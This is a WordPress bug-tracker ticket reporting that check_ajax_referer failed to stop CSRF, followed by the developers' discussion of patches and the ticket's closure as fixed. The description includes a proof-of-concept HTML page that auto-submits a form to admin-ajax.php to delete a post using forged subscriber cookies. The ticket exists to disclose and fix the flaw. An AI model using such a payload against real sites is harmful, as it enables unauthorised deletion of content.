Ticket #4939 (closed defect (bug): fixed)

Opened 4 years ago

Last modified 4 years ago

check_ajax_referer does not protect from CSRF at all

Reported by: xknown Owned by: anonymous
Priority: high Milestone: 2.3
Component: Security Version: 2.3
Severity: normal Keywords:
Cc:

Description

check_ajax_referer only checks if the incoming request contains valid user credentials but wp_get_current_user still uses WP cookies to determine the current user, so anyone with a subscriber role (or another role) can perform CSRF attacks. 

<html>
<body>
	<form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php">
		<input type="text" name="action" value="delete-post" />
		<input type="text" name="id" value="Post_ID" />
		<input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" />		
	</form>
	<script>document.forms[0].submit();</script>
</body>
</html>

Attachments

pluggable.diff Download (357 bytes) - added by xknown 4 years ago.
Set current user in check_ajax_referer.
4939.diff Download (977 bytes) - added by mdawaffe 4 years ago.

Change History

xknown4 years ago

Set current user in check_ajax_referer.

comment:1   mdawaffe4 years ago

Rather than setting the user, we could check to see if the current user matches the user from the cookie and die('-1') otherwise.

mdawaffe4 years ago

comment:2   Nazgul4 years ago

  • Priority changed from normal to high
  • Milestone set to 2.3

comment:3   ryan4 years ago

  • Status changed from new to closed
  • Resolution set to fixed

(In [6138]) Extra protection in check_ajax_referer from mdawaffe. fixes #4939

Note: See TracTickets for help on using tickets.